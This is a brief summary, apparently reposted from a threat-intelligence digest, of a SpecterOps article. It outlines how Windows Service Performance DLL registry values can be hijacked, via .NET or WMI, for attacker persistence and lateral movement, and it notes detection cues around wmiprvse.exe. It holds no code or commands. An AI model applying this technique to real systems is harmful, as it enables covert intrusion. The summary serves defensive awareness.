Performance, Diagnostics, and WMI

Windows offers tons of useful tools that administrators can leverage to perform their daily jobs. A lot of times, those tools are looked at from an offensive standpoint and use cases for them are discovered.

Windows offers a variety of tools that can be used by administrators to perform their daily tasks. Recently, Lee Christensen discovered the potential of Service Performance DLLs and the possibility of new opportunities that could come from it. Windows collects performance data which can be accessed through Performance Monitor, and the data is stored in the registry. The registry values are either V1 or V2, and Microsoft recommends using V2.

Weaponizing this data requires dropping a DLL on the target, updating the Library registry value with the DLL location, and updating the Open, Collect, and Close registry values to reflect the exported functions of the DLL. This can be done through .NET or WMI. .NET offers a way to interact directly with diagnostic data through the System.Diagnostics namespace, and WMI has two classes that can be used to retrieve data and ultimately execute the DLL.

If a collection is run and Windows does not collect information in the expected way, errors will likely show up. Windows offers a tool, lodctr.exe, that can fix any broken performance counters if this ever becomes a problem. Additionally, performance counters can be manually created and registered with Performance Monitor, which could offer further opportunities for persistence or other services to leverage for lateral movement.

Detecting potential malicious use of performance data can be prone to false positives and would require a good baseline of WMI data in an environment. Additionally, wmiprvse.exe will query all of the V1 and V2 registry keys for performance DLLs, which could be a sign of malicious activity.

Overall, Performance Monitor offers some interesting ways for attackers to extend their lateral movement or persistence opportunities by hijacking a service’s performance DLL. With this, attackers gain a novel WMI lateral movement primitive and there is potential for further discoveries. Tooling has been released on GitHub to demonstrate the proof of concept. Defensive considerations should be taken to detect potential malicious use of performance data.

📓 Performance, Diagnostics, and WMI

👉🏽 Windows offers tons of useful tools that administrators can leverage to perform their daily jobs. A lot of times, those tools are looked at from an offensive standpoint and use cases for them are discovered. 👉🏽 Windows offers administrators various tools for daily tasks and performance monitoring. 👉🏽 Lee Christensen discovered the potential of Service Performance DLLs and new opportunities. 👉🏽 Windows collects performance data stored in the registry with V1 or V2 values. 👉🏽 Weaponizing the data involves updating DLL location and registry values. 👉🏽 .NET and WMI can be used to interact with diagnostic data and execute DLLs. 👉🏽 Windows provides lodctr.exe to fix broken performance counters. 👉🏽 Performance counters can be manually created and registered for further opportunities. 👉🏽 Detecting malicious use requires a good baseline of WMI data and potential indicators. 👉🏽 wmiprvse.exe queries registry keys, indicating potential malicious activity. 👉🏽 Performance Monitor allows attackers to extend lateral movement and persistence, requiring defensive considerations.

🔗 source link: https://posts.specterops.io/performance-diagnostics-and-wmi-21f3e01790d3

🔗 summarized content: https://hut.threathunterz.com/battlefield-intel/articles-and-reports/performance-diagnostics-and-wmi

#WindowsTools #PerformanceDLLs #RegistryValues #LateralMovement #MaliciousActivity